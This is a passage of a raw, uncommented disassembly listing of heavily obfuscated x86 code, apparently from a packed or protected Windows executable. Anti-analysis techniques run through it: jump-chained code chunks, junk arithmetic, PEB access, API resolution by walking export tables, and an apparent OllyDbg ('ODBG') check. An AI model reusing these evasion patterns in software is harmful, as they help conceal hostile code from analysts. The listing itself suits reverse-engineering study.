sub_427B35 proc near ; CODE XREF: _94j21ax3:0042BE7E�p
push ebp
mov ebp, esp
add esp, 0FFFFFF90h
call sub_42AEB2
sub_427B35 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_421457
loc_427B40: ; CODE XREF: sub_421457:loc_426AD2�j
or eax, eax
loc_427B42: ; CODE XREF: sub_423324:loc_4283C5�j
jnz loc_42A4D2
call sub_42574E
mov edx, 17B3C1CFh
call sub_4239A5
push eax
ror eax, 0Dh
push offset loc_428A3F
jmp loc_4295BB
; END OF FUNCTION CHUNK FOR sub_421457
; ---------------------------------------------------------------------------
jg loc_4230AA
jmp sub_42552D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_427B70: ; CODE XREF: sub_42C1AE:loc_42AA02�j
and eax, 0FFFh
add [esi], eax
and edx, 0FFFFDDFFh
xor [esi], edx
mov eax, 80000000h
cpuid
jmp loc_42C228
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
loc_427B8B: ; DATA XREF: sub_42BDF4:loc_425762�o
pop ecx
call sub_42552D
; START OF FUNCTION CHUNK FOR sub_423324
loc_427B91: ; CODE XREF: sub_423324+50C3�j
jmp loc_42A93B
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_427B96: ; CODE XREF: sub_423F55-A5F�j
pop eax
xor eax, 0E5D4B817h
call sub_425A09
jmp loc_423DFA
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
mov dword ptr [ebp-8], 1
jmp loc_42B291
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_427BB3: ; CODE XREF: sub_42284F+F27�j
; sub_42284F+56A6�j ...
mov eax, [ebp-10h]
push eax
push eax
jmp loc_42BC1F
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A254
loc_427BBD: ; CODE XREF: sub_42A254-5D0B�j
mov edx, [eax]
mov eax, 2EEB8924h
shl ebp, 15h
jmp loc_42BD9C
; END OF FUNCTION CHUNK FOR sub_42A254
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42574E
loc_427BCC: ; CODE XREF: sub_42574E:loc_425753�j
pop esi
or esi, 41411882h
rol esi, 0Bh
add esi, 975E4E84h
xchg esi, [esp-4+arg_0]
jmp loc_42BAA7
; END OF FUNCTION CHUNK FOR sub_42574E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425983
loc_427BE4: ; CODE XREF: sub_425983:loc_425994�j
mov ebx, [eax+18h]
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
or ecx, ecx
jz loc_42AC48
push offset loc_4216AE
jmp nullsub_50
; END OF FUNCTION CHUNK FOR sub_425983
; ---------------------------------------------------------------------------
mov eax, [ebp-30h]
push edi
push 8C91A352h
mov edi, offset word_426942
xchg edi, [esp]
jmp loc_4282E6
; ---------------------------------------------------------------------------
mov al, 1
pop edx
call edx ; GetModuleHandleA
xor eax, eax
push ecx
push 0C536793Dh
pop ecx
add ecx, 8B09E806h
jmp loc_426ABD
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_427C30: ; CODE XREF: sub_421689+A2�j
jmp loc_42A2F8
; END OF FUNCTION CHUNK FOR sub_421689
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427C35 proc near ; DATA XREF: sub_42426B+6DB4�o
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0042362D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424EA5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042B170 SIZE 0000000D BYTES
push ebp
mov ebp, esp
push ecx
xchg ebp, edi
jmp loc_42B170
sub_427C35 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42266A
loc_427C40: ; CODE XREF: sub_423D25+4�j
; sub_42266A:loc_42650F�j ...
jz loc_42C324
push eax
push offset sub_424EE4
jmp nullsub_51
; END OF FUNCTION CHUNK FOR sub_42266A
; ---------------------------------------------------------------------------
test al, al
jz loc_427C6F
call nullsub_219
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425324
loc_427C5F: ; CODE XREF: sub_425324+3663�j
jmp loc_421DBD
; END OF FUNCTION CHUNK FOR sub_425324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421A9F
loc_427C64: ; CODE XREF: sub_421A9F+16�j
jmp loc_42C0A3
; END OF FUNCTION CHUNK FOR sub_421A9F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_219. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B856
loc_427C6A: ; CODE XREF: sub_42B856-2BE0�j
jmp loc_428CF9
; END OF FUNCTION CHUNK FOR sub_42B856
; ---------------------------------------------------------------------------
loc_427C6F: ; CODE XREF: _94j21ax3:00427C53�j
call sub_42C057
jmp loc_425BB3
; ---------------------------------------------------------------------------
loc_427C79: ; DATA XREF: sub_42A0CC-1B1C�o
add eax, 0B2A66423h
call sub_425A09
jmp loc_429B2C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_427C89: ; CODE XREF: sub_42A0CC-6806�j
jo loc_4234D4
call nullsub_7
mov eax, large fs:30h
add eax, 22A968CCh
jmp loc_423A10
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
dw 8A0Fh
dd 3815h
; =============== S U B R O U T I N E =======================================
sub_427CAC proc near ; CODE XREF: sub_428BBD+7�p
; FUNCTION CHUNK AT 0042414E SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00428BA7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A533 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042B818 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BE32 SIZE 00000011 BYTES
xchg ebx, [esp+0]
pop ebx
push eax
jmp loc_428BA7
sub_427CAC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_427CB6 proc near ; DATA XREF: sub_423DB5+415D�o
; FUNCTION CHUNK AT 0042B1DF SIZE 00000008 BYTES
cmp ds:dword_4256CC, 0
jnz loc_42B1DF
lea eax, [ebp-14h]
push eax
push edx
jmp loc_423369
sub_427CB6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A709
loc_427CCD: ; CODE XREF: sub_42A709+9�j
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
test byte ptr [eax-8], 80h
jmp loc_421D1B
; END OF FUNCTION CHUNK FOR sub_42A709
; ---------------------------------------------------------------------------
ja loc_421FD9
jmp loc_422603
; =============== S U B R O U T I N E =======================================
sub_427CEA proc near ; CODE XREF: sub_42BAC2+6�p
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00422F29 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428AA8 SIZE 0000000E BYTES
mov [esp+0], eax
push eax
push eax
push 9B28A7E3h
pop eax
sub eax, 0F090E65Ch
rol eax, 6
jmp loc_428AA8
sub_427CEA endp
; =============== S U B R O U T I N E =======================================
sub_427D03 proc near ; DATA XREF: sub_42B3E4:loc_425965�o
; FUNCTION CHUNK AT 00428459 SIZE 00000005 BYTES
mov eax, [ebp+8]
call sub_427AEB
loc_427D0B: ; CODE XREF: _94j21ax3:loc_423CAF�j
call sub_42BFF0
jmp loc_428459
sub_427D03 endp
; =============== S U B R O U T I N E =======================================
sub_427D15 proc near ; CODE XREF: sub_42BB39:loc_4271FD�j
; FUNCTION CHUNK AT 004276BF SIZE 00000023 BYTES
add esp, 0FFFFFFECh
mov eax, (offset loc_426F36+2)
call sub_424E34
jmp loc_4276BF
sub_427D15 endp
; ---------------------------------------------------------------------------
not edi
jmp sub_4266F6
; ---------------------------------------------------------------------------
locret_427D2E: ; CODE XREF: _94j21ax3:0042272F�j
; _94j21ax3:004237F7�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B43F
loc_427D2F: ; CODE XREF: sub_42B43F+14�j
jmp loc_42AF42
; END OF FUNCTION CHUNK FOR sub_42B43F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427004
loc_427D34: ; CODE XREF: sub_427004-5AF1�j
mov ebp, [edi]
add edi, 984F3666h
and edx, 0BD040CF6h
loc_427D42: ; CODE XREF: sub_427004-5AF9�j
push offset sub_4296F7
jmp nullsub_143
; END OF FUNCTION CHUNK FOR sub_427004
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_427D4C: ; CODE XREF: sub_42A0CC:loc_42A183�j
xor edi, edx
jmp loc_4234BE
; END OF FUNCTION CHUNK FOR sub_42A0CC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_427D53 proc near ; DATA XREF: sub_424EB4:loc_42C31A�o
; FUNCTION CHUNK AT 0042189C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00421E32 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004229C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423832 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042ABE1 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push ecx
loc_427D57: ; CODE XREF: sub_429862-2238�j
mov esp, ebp
pop ebp
mov eax, ds:dword_42407C
jmp loc_42189C
sub_427D53 endp
; =============== S U B R O U T I N E =======================================
sub_427D65 proc near ; CODE XREF: sub_42C1AE-97F2�p
; _94j21ax3:0042B5B7�j
; FUNCTION CHUNK AT 00421A7E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00421E46 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00423114 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00423D6F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424298 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004247C6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C28E SIZE 00000011 BYTES
mov [esp+0], eax
pop eax
mov eax, edi
pop edi
xor [esi], edx
jmp loc_42C28E
sub_427D65 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429B81
loc_427D73: ; CODE XREF: sub_429B81+1A�j
xor eax, 56732BD7h
add eax, ebp
add eax, 571BCF5Eh
mov eax, [eax]
push offset sub_42B202
jmp nullsub_215
; END OF FUNCTION CHUNK FOR sub_429B81
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423EAE
loc_427D8D: ; CODE XREF: sub_423EAE:loc_42B2A4�j
push ecx
mov esp, ebp
call sub_421457
rol edx, 13h
jmp sub_427FF5
; END OF FUNCTION CHUNK FOR sub_423EAE
; =============== S U B R O U T I N E =======================================
sub_427D9D proc near ; CODE XREF: sub_42A919:loc_424940�p
; _94j21ax3:00429A40�j
mov [esp+0], edi
pop edi
xor ebx, ebx
loc_427DA3: ; CODE XREF: sub_42AC2D+15�j
mov eax, ebx
pop ecx
pop ebx
jmp nullsub_52
sub_427D9D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_427DAC: ; CODE XREF: sub_42169F+5A8D�j
rol eax, 18h
loc_427DAF: ; CODE XREF: sub_42169F:loc_42535F�j
mov eax, 0E0h
push esi
push 0C7553A98h
jmp loc_4243BF
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42191F
loc_427DBF: ; CODE XREF: sub_42191F:loc_421924�j
call sub_42541E
pop edx
push eax
mov edx, 0FFFFFFFFh
push edx
jmp loc_42BC50
; END OF FUNCTION CHUNK FOR sub_42191F
; =============== S U B R O U T I N E =======================================
sub_427DD1 proc near ; DATA XREF: _94j21ax3:00429FCB�o
or edx, edx
jz loc_42933E
sub_427DD1 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42678A
loc_427DD9: ; CODE XREF: sub_42678A-2E9B�j
; sub_42678A+15�j
jns loc_4277B8
add edx, 14h
call sub_42678A
; END OF FUNCTION CHUNK FOR sub_42678A
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_427DE7: ; CODE XREF: sub_428BBD-3731�j
jmp loc_421DA4
; END OF FUNCTION CHUNK FOR sub_428BBD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_49. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422CA6
loc_427DED: ; CODE XREF: sub_422CA6+8�j
jmp loc_4259CA
; END OF FUNCTION CHUNK FOR sub_422CA6
; ---------------------------------------------------------------------------
loc_427DF2: ; DATA XREF: sub_424B76+F�o
cmp dword ptr [ebp-4], 0
jz loc_423F37
call nullsub_11
; START OF FUNCTION CHUNK FOR sub_423F55
loc_427E01: ; CODE XREF: _94j21ax3:004259BA�j
; sub_423F55:loc_426694�j
jz loc_42219C
jmp loc_426F7D
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
sbb esi, edx
jmp loc_424AEA
; =============== S U B R O U T I N E =======================================
sub_427E13 proc near ; CODE XREF: _94j21ax3:004236C6�j
; sub_4216D0+2764�p
; FUNCTION CHUNK AT 0042136C SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00421E1E SIZE 00000005 BYTES
mov [esp+0], edi
pop edi
add ebx, ebp
add ebx, 9CB7FBA9h
mov [ebx], edx
pop ebx
loc_427E22: ; CODE XREF: sub_421388:loc_425B22�j
mov eax, [ebp-0Ch]
jmp loc_421E1E
sub_427E13 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428993
loc_427E2A: ; CODE XREF: sub_428993:loc_428D38�j
add edx, edi
pop edi
mov eax, offset dword_422278
push edi
push 0C691DCCAh
pop edi
jmp loc_42391F
; END OF FUNCTION CHUNK FOR sub_428993
; ---------------------------------------------------------------------------
adc edi, esi
sub ebx, ecx
jmp sub_4239F1
; ---------------------------------------------------------------------------
ror edi, 0Ch
sub esi, ecx
jmp sub_428EBB
; ---------------------------------------------------------------------------
call sub_42A852
; START OF FUNCTION CHUNK FOR sub_42484C
loc_427E56: ; CODE XREF: sub_42484C+597D�j
cmp dword ptr [ebp-10h], 3
loc_427E5A: ; CODE XREF: sub_4272E9:loc_42A4BD�j
jnb loc_42C1A3
mov eax, [ebp+8]
cmp dword ptr [eax-14h], 4
jnz loc_427AF8
jmp loc_4290D5
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
loc_427E72: ; CODE XREF: _94j21ax3:loc_427979�j
mov eax, [ebp-0Ch]
cmp byte ptr [eax], 0
jnz loc_425743
mov eax, [ebp-4]
mov [ebp-0Ch], eax
shl dword ptr [ebp-8], 8
; START OF FUNCTION CHUNK FOR sub_421047
loc_427E88: ; CODE XREF: sub_421047+46F7�j
; _94j21ax3:0042BD84�j
js loc_426BF7
call sub_4237DC
loc_427E93: ; DATA XREF: sub_42BF1B-9A0E�o
cmp byte ptr [eax], 0
jnz loc_427895
loc_427E9C: ; CODE XREF: sub_422F0A:loc_422F19�j
js loc_4249F6
lea eax, [ebp-125h]
push eax
jmp loc_429B4B
; END OF FUNCTION CHUNK FOR sub_421047
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_427EAE: ; CODE XREF: sub_423324:loc_423440�j
call sub_4250F7
loc_427EB3: ; CODE XREF: sub_4276A3:loc_4215F0�j
jz loc_421A63
jmp loc_42A3CE
; END OF FUNCTION CHUNK FOR sub_423324
; =============== S U B R O U T I N E =======================================
sub_427EBE proc near ; DATA XREF: sub_428C49+1D3�o
; FUNCTION CHUNK AT 004210FA SIZE 00000006 BYTES
call sub_42A3EE
test eax, eax
jz loc_4294BD
add eax, edx
xor eax, ebx
add eax, ecx
jmp loc_4210FA
sub_427EBE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_427ED6: ; CODE XREF: sub_421689:loc_4236F3�j
; _94j21ax3:loc_424DD2�j
call sub_42C24F
loc_427EDB: ; CODE XREF: sub_428205+3268�j
jmp loc_423E53
; END OF FUNCTION CHUNK FOR sub_421689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C1AE
loc_427EE0: ; CODE XREF: sub_42C1AE-72CF�j
jmp loc_424E99
; END OF FUNCTION CHUNK FOR sub_42C1AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427668
loc_427EE5: ; CODE XREF: sub_427668-47C�j
jl nullsub_168
; END OF FUNCTION CHUNK FOR sub_427668
; START OF FUNCTION CHUNK FOR sub_42284F
loc_427EEB: ; CODE XREF: sub_42284F-1628�j
; sub_42284F-161F�j ...
jnb loc_42A6E0
cmp dword ptr [ebp-4], 7
jnz loc_427BB3
jmp loc_422115
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DB5
loc_427F00: ; CODE XREF: sub_423DB5+168E�j
add eax, edi
pop edi
loc_427F03: ; CODE XREF: _94j21ax3:00422533�j
xchg eax, edx
push edx
xchg eax, edx
call sub_42BFF0
mov ds:dword_4256CC, eax
push offset sub_427CB6
jmp nullsub_106
; END OF FUNCTION CHUNK FOR sub_423DB5
; =============== S U B R O U T I N E =======================================
sub_427F1C proc near ; DATA XREF: _94j21ax3:00425638�o
; FUNCTION CHUNK AT 004239BF SIZE 00000005 BYTES
push ebx
push eax
push esi
mov esi, ecx
jmp loc_4239BF
sub_427F1C endp
; ---------------------------------------------------------------------------
loc_427F26: ; DATA XREF: sub_42284F:loc_421F1C�o
add esi, 60D9F5DAh
xchg esi, [esp]
jmp sub_4239A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421822
loc_427F34: ; CODE XREF: sub_421822+A08F�j
push ecx
loc_427F35: ; CODE XREF: _94j21ax3:00422A15�j
sbb esi, 644F0284h
sub ecx, 54907529h
jmp loc_42C02B
; END OF FUNCTION CHUNK FOR sub_421822
; ---------------------------------------------------------------------------
loc_427F46: ; CODE XREF: _94j21ax3:004281CF�j
push esi
push 0C29874DFh
pop esi
xor esi, 0DD18E099h
jmp loc_422E0E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4259BF
loc_427F58: ; CODE XREF: sub_4259BF:loc_425949�j
not ebx
jmp loc_42AB10
; END OF FUNCTION CHUNK FOR sub_4259BF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42220B
loc_427F5F: ; CODE XREF: sub_42220B+95EA�j
jl loc_42AC6B
adc edx, esi
loc_427F67: ; CODE XREF: sub_42220B-E21�j
add ebx, 8B57B684h
xchg ebx, [esp+8+var_8]
jmp loc_42AC28
; END OF FUNCTION CHUNK FOR sub_42220B
; ---------------------------------------------------------------------------
test al, al
jz loc_42A86F
jmp loc_42A837
; ---------------------------------------------------------------------------
sub ebx, edx
jmp sub_42AADB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4221B8
loc_427F89: ; CODE XREF: sub_4221B8+8941�j
jno loc_42782E
shr eax, 1
shl eax, 11h
pushf
jmp loc_4271B5
; END OF FUNCTION CHUNK FOR sub_4221B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B03C
loc_427F9A: ; CODE XREF: sub_42B03C:loc_424D53�j
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_42B03C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428694
loc_427F9D: ; CODE XREF: sub_428694-1A21�j
jmp sub_423278
; END OF FUNCTION CHUNK FOR sub_428694
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424902
loc_427FA2: ; CODE XREF: sub_424902+F�j
jmp loc_426642
; END OF FUNCTION CHUNK FOR sub_424902
; ---------------------------------------------------------------------------
loc_427FA7: ; CODE XREF: _94j21ax3:00424410�j
jmp loc_42BBE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B03C
loc_427FAC: ; CODE XREF: sub_42BFAD-8406�j
; sub_42B03C+F5F�j
xor eax, eax
mov [ebp-8], eax
jmp loc_423BB4
; END OF FUNCTION CHUNK FOR sub_42B03C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4273AE
loc_427FB6: ; CODE XREF: sub_4273AE:loc_426BCF�j
add edi, 1ED9596Ch
xchg edi, [esp+0]
jmp loc_42752B
; END OF FUNCTION CHUNK FOR sub_4273AE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421402
loc_427FC4: ; CODE XREF: sub_421402:loc_4282E1�j
add eax, 0FE8D37B1h
mov eax, [eax]
push eax
call sub_429BE2
jmp loc_42280A
; END OF FUNCTION CHUNK FOR sub_421402
; ---------------------------------------------------------------------------
mov eax, [ebp-4]
pushf
mov [esp], eax
jmp loc_429BD0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425790
loc_427FE3: ; CODE XREF: sub_425790:loc_42406C�j
ror eax, 19h
mov ds:dword_423418, eax
retn
; END OF FUNCTION CHUNK FOR sub_425790
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A9E7
loc_427FED: ; CODE XREF: sub_42A9E7:loc_427A9A�j
rol eax, 19h
jmp loc_429CA9
; END OF FUNCTION CHUNK FOR sub_42A9E7
; =============== S U B R O U T I N E =======================================
sub_427FF5 proc near ; CODE XREF: sub_423EAE+3EEA�j
; sub_426744+3679�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042AB44 SIZE 00000004 BYTES
xchg ecx, [esp+0]
pop ecx
xchg edi, [esp-4+arg_0]
mov ebp, edi
mov edi, offset nullsub_10
jmp loc_42AB44
sub_427FF5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
shr esi, 5
jmp loc_4244A3
; ---------------------------------------------------------------------------
xchg edi, [ebp+0]
jmp sub_4273AE
; ---------------------------------------------------------------------------
jns loc_4267E8
add eax, 6A7FDAB7h
jmp sub_425808
; ---------------------------------------------------------------------------
loc_428029: ; DATA XREF: sub_42AB30-5DAE�o
push 8F84FDC7h
pop edx
or edx, 0B4FB902Eh
test edx, 8000h
jmp loc_428B29
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_131. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423BF8
loc_428041: ; CODE XREF: sub_423BF8:loc_429E24�j
or eax, eax
jnz loc_4286FD
call sub_42574E
mov edx, 0C231F698h
push edx
push 0FCA18E34h
pop edx
and edx, 8E696D28h
jmp loc_421EF0
; END OF FUNCTION CHUNK FOR sub_423BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AE1
loc_428065: ; CODE XREF: sub_428AE1:loc_428AE7�j
mov eax, [eax]
push edi
push 3C67FE88h
pop edi
jmp loc_428C2C
; END OF FUNCTION CHUNK FOR sub_428AE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_428073: ; CODE XREF: sub_42284F:loc_426480�j
and eax, 4EFF33C8h
sub eax, edx
push esi
jmp loc_423028
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42134B
loc_428081: ; CODE XREF: sub_42134B+8313�j
lea eax, [ebp-20h]
push eax
call sub_42B83A
push esi
jmp loc_4292C0
; END OF FUNCTION CHUNK FOR sub_42134B
; =============== S U B R O U T I N E =======================================
sub_428090 proc near ; DATA XREF: sub_421047+8B09�o
arg_0 = dword ptr 4
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jnz loc_423F5C
call sub_422B4F
loc_4280A2: ; CODE XREF: _94j21ax3:0042A039�j
or ecx, 6238EBC2h
loc_4280A8: ; CODE XREF: sub_423917+3�p
mov [esp+0], edx
pop edx
mov esp, ebp
mov ebp, offset loc_42BBBD
xchg ebp, [esp-4+arg_0]
retn
sub_428090 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABB1
loc_4280B7: ; CODE XREF: sub_42ABB1-13E�j
jmp nullsub_179
; END OF FUNCTION CHUNK FOR sub_42ABB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4237DC
loc_4280BC: ; CODE XREF: sub_4237DC+A�j
; sub_421047:loc_42A236�j
call sub_4268C1
; END OF FUNCTION CHUNK FOR sub_4237DC
; START OF FUNCTION CHUNK FOR sub_423324
loc_4280C1: ; CODE XREF: sub_423324+7F�j
jmp nullsub_54
; END OF FUNCTION CHUNK FOR sub_423324
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_22. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421CAA
loc_4280C7: ; CODE XREF: sub_421CAA+15BF�j
jl locret_427094
loc_4280CD: ; CODE XREF: sub_429163+4�j
popf
loc_4280CE: ; CODE XREF: sub_421CAA:loc_426B97�j
call sub_42191F
loc_4280D3: ; CODE XREF: sub_423C3E:loc_427144�j
jnz loc_4225C8
jmp loc_42A327
; END OF FUNCTION CHUNK FOR sub_421CAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4225A5
loc_4280DE: ; CODE XREF: sub_4225A5:loc_4266E6�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_4225A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4266F6
loc_4280E0: ; CODE XREF: sub_4266F6+1C44�j
push offset sub_42AFDF
jmp loc_427403
; END OF FUNCTION CHUNK FOR sub_4266F6
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C24F
loc_4280EB: ; CODE XREF: sub_42C24F+E�j
jmp loc_4214C7
; END OF FUNCTION CHUNK FOR sub_42C24F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_4280F0: ; CODE XREF: sub_421D33+586B�j
jmp loc_421F05
; END OF FUNCTION CHUNK FOR sub_421D33
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_69. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4280F6: ; CODE XREF: _94j21ax3:00426802�j
jmp loc_429743
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42169F
loc_4280FB: ; CODE XREF: sub_42169F+759E�j
call sub_42C057
test al, al
jz loc_424C9D
loc_428108: ; CODE XREF: _94j21ax3:00426758�j
call sub_428118
retn
; END OF FUNCTION CHUNK FOR sub_42169F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BBF9
loc_42810E: ; CODE XREF: sub_42BBF9-2DE4�j
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_42BBF9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B04
loc_428113: ; CODE XREF: sub_423B04+E�j
jmp locret_429377
; END OF FUNCTION CHUNK FOR sub_423B04
; =============== S U B R O U T I N E =======================================
sub_428118 proc near ; CODE XREF: sub_42169F:loc_428108�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424194 SIZE 00000014 BYTES
push ecx
jmp loc_424194
sub_428118 endp
; ---------------------------------------------------------------------------
jbe loc_422FBF
jmp sub_42B052
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428993
loc_428129: ; CODE XREF: sub_428993:loc_42391F�j
or edi, 99CC8E06h
add edi, 2064E077h
xchg edi, [esp+18h+var_18]
jmp loc_42A690
; END OF FUNCTION CHUNK FOR sub_428993
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_42813D: ; CODE XREF: sub_422EB0+4C1F�j
jnp loc_42A592
or edi, 2F74D85Ah
loc_428149: ; CODE XREF: sub_422EB0:loc_4212BA�j
lea eax, [ebp-25Ch]
cmp dword ptr [eax], 4742444Fh
jz loc_42A566
jmp loc_428E48
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_428160: ; CODE XREF: sub_42284F-1619�j
jz loc_423575
jmp loc_421599
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
mov edx, 9278ADE5h
call sub_422E59
; START OF FUNCTION CHUNK FOR sub_422436
loc_428175: ; CODE XREF: sub_422436+8�j
jmp loc_42C393
; END OF FUNCTION CHUNK FOR sub_422436
; ---------------------------------------------------------------------------
loc_42817A: ; CODE XREF: _94j21ax3:004213BF�j
sbb ebp, 9E40416h
; =============== S U B R O U T I N E =======================================
sub_428180 proc near ; CODE XREF: sub_423324:loc_427732�p
; FUNCTION CHUNK AT 00427886 SIZE 0000000A BYTES
xchg ecx, [esp+0]
pop ecx
add edx, 2EFE6C2Dh
call sub_4271F1
loc_42818F: ; CODE XREF: sub_42780F+34C5�j
jmp loc_427886
sub_428180 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_115. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
